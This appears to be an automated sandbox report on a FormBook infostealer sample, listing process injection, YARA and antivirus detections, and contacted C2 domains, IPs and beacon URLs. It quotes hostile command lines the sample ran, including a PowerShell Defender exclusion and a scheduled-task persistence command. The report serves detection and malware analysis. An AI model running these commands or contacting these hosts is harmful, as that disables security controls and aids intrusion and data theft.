Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 997008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A08008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4574433830.00000000048E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000002.4570236364.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2139208430.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000000.2154297535.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075211732.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979149239.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_00726735 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

15_2_00726735

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.134.182	www.dandevonald.com	United States	13335	CLOUDFLARENETUS	true
157.53.227.1	www.carmen-asa.com	United States	36236	NETACTUATEUS	true
3.33.130.190	rs-alohafactorysaleuua.shop	United States	8987	AMAZONEXPANSIONGB	true

Contacted Domains

Name	IP	Active
www.dandevonald.com	172.67.134.182	true
286live.com	206.233.130.31	true
www.midsouthhealthcare.com	3.64.163.50	true
www.carmen-asa.com	157.53.227.1	true
gtml.huksa.huhusddfnsuegcdn.com	194.41.37.230	true
www.incrediblyxb.christmas	167.172.226.170	true
rs-alohafactorysaleuua.shop	3.33.130.190	true
www.20allhen.online	103.224.182.210	true
www.dunia188j.store	unknown	unknown
www.tqqft8l5.xyz	unknown	unknown
www.jwoalhbn.xyz	unknown	unknown
www.99812.photos	unknown	unknown
www.rs-alohafactorysaleuua.shop	unknown	unknown
www.286live.com	unknown	unknown
www.ttyijlaw.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.rs-alohafactorysaleuua.shop/gy15/?RzuTsp=XHNRiWOL6AKBRIWnLgJD49myVGc8KkvpE41aN949WbE5iIv/qrJ/+jvCIwl+PYhctV8eVI3XMQ==&hL08qP=ojn0sl	false	Avira URL Cloud: safe	unknown
www.dunia188j.store/gy15/	true	Avira URL Cloud: safe	unknown
http://www.carmen-asa.com/gy15/?RzuTsp=ojuzNIgvg1BwHmAcToIecm58HYsz0PWD/adWnxcLSOv/0CtFh7ct+QMG65Nx8hG2JCp7w1BwJA==&hL08qP=ojn0sl	true	Avira URL Cloud: safe	unknown
http://www.dandevonald.com/gy15/?RzuTsp=Y/N4KrVAXY1kocpgzu8WnG77ol+AHv4xLUA59fG9L70w7yqxHWlTkc1yvlLlDHtztMKBj2yhyA==&hL08qP=ojn0sl	true	Avira URL Cloud: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Avira: detection malicious, Label: HEUR/AGEN.1357443

Found malware configuration

Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	ReversingLabs: Detection: 27%
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Virustotal: Detection: 24%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: dKJy.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dKJy.pdb source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 4x nop then jmp 0730ED1Ch	0_2_0730E3D9
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 4x nop then jmp 0730E01Ch	8_2_0730D6D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	13_2_0040E41E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	13_2_0040E43D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	15_2_02B5E43D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	15_2_02B5E41E

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 157.53.227.1 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.134.182 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.dunia188j.store/gy15/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.tqqft8l5.xyz
Source:	DNS query: www.jwoalhbn.xyz

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=Y/N4KrVAXY1kocpgzu8WnG77ol+AHv4xLUA59fG9L70w7yqxHWlTkc1yvlLlDHtztMKBj2yhyA==&hL08qP=ojn0sl HTTP/1.1Host: www.dandevonald.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=ojuzNIgvg1BwHmAcToIecm58HYsz0PWD/adWnxcLSOv/0CtFh7ct+QMG65Nx8hG2JCp7w1BwJA==&hL08qP=ojn0sl HTTP/1.1Host: www.carmen-asa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=XHNRiWOL6AKBRIWnLgJD49myVGc8KkvpE41aN949WbE5iIv/qrJ/+jvCIwl+PYhctV8eVI3XMQ==&hL08qP=ojn0sl HTTP/1.1Host: www.rs-alohafactorysaleuua.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 3.33.130.190 3.33.130.190

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: NETACTUATEUS NETACTUATEUS
Source: Joe Sandbox View	ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
